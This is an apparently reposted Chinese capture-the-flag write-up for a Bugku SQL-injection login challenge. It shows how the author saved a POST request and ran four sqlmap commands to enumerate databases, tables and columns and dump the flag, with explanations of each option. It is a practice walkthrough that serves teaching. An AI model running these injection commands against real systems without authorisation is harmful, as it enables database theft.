bugku_web_這是一個神奇的登錄界面


首先,通過這個URL:http://120.24.86.145:9001/sql/

和這個風騷的界面,很明顯的SQL注入題目

 

然后打開源代碼看看:

 

action居然沒有目標腳本???

這基本上可以驗證就是使用sql注入了

既然是sql注入,那就要用到注入神器sqlmap了!

不過,因為這是post方法,所以我們只能使用-r + 請求頭的方式

  接下來是保存請求頭

  首先打開火狐代理:

  

  //無關緊要的小技巧:最好在輸入框里輸入好用戶名和密碼之后再點提交

  

  //無關緊要的注意點:一定要把里面的內容全選(Ctrl+A)再copy to file

  我又把保存好的文件拖到了kali攻擊機上,路徑是:/zzz/1.txt

接下來素質四連它:

//以下命令在kali 2.0中運行正常

1、sqlmap -r "/zzz/1.txt" -p admin_name --dbs

-r + 路徑是以只讀方式打開 -p + admin_name是選取admin_name為注入點(injection point) --dbs是爆破數據庫名

2、sqlmap -r "/zzz/1.txt" -D bugkusql1 -p admin_name --tables

--tables 是爆列表名

3、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -p admin_name --columns

--columns是爆列名

4、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump

--dump是爆字段

??我不明白的是,為什么爆字段的時候,不需要輸入y/n而是不停的回車就行了呢?這兩種操作究竟有什么不同呢?

最后得到flag

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM